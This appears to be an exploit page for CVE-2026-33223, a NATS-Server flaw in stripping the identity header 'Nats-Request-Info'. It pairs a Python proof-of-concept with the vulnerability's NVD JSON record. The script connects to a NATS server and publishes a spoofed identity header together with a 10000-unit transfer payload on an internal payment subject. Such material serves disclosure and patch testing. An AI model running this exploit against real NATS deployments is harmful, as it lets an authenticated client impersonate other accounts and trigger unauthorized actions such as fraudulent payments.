CVE-2026-33223

import asyncio import nats async def exploit(): # Connect to the vulnerable NATS server nc = await nats.connect("nats://localhost:4222") # Malicious headers to spoof identity # The server fails to strip this header effectively headers = { "Nats-Request-Info": "malicious_user_account", "Content-Type": "application/json" } # Target a service relying on Nats-Request-Info for auth subject = "svc.internal.payment" payload = b"{\"action\": \"transfer\", \"amount\": 10000}" # Publish message with spoofed header await nc.publish(subject, payload, headers=headers) print("[+] Exploit payload sent with spoofed Nats-Request-Info header") await nc.close() if __name__ == '__main__': asyncio.run(exploit())

{"cve": {"id": "CVE-2026-33223", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:47.397", "lastModified": "2026-03-26T17:18:04.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, the NATS message header `Nats-Request-Info:` is supposed to be a guarantee of identity by the NATS server, but the stripping of this header from inbound messages was not fully effective. An attacker with valid credentials for any regular client interface could thus spoof their identity to services which rely upon this header. Versions 2.11.15 and 2.12.6 contain a fix. No known workarounds are available."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, la cabecera de mensaje de NATS 'Nats-Request-Info:' se supone que es una garantía de identidad por parte del servidor NATS, pero la eliminación de esta cabecera de los mensajes entrantes no fue completamente efectiva. Un atacante con credenciales válidas para cualquier interfaz de cliente regular podría así suplantar su identidad a servicios que dependen de esta cabecera. Las versiones 2.11.15 y 2.12.6 contienen una solución. No hay soluciones alternativas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-09.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-pwx7-fx9r-hr4h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}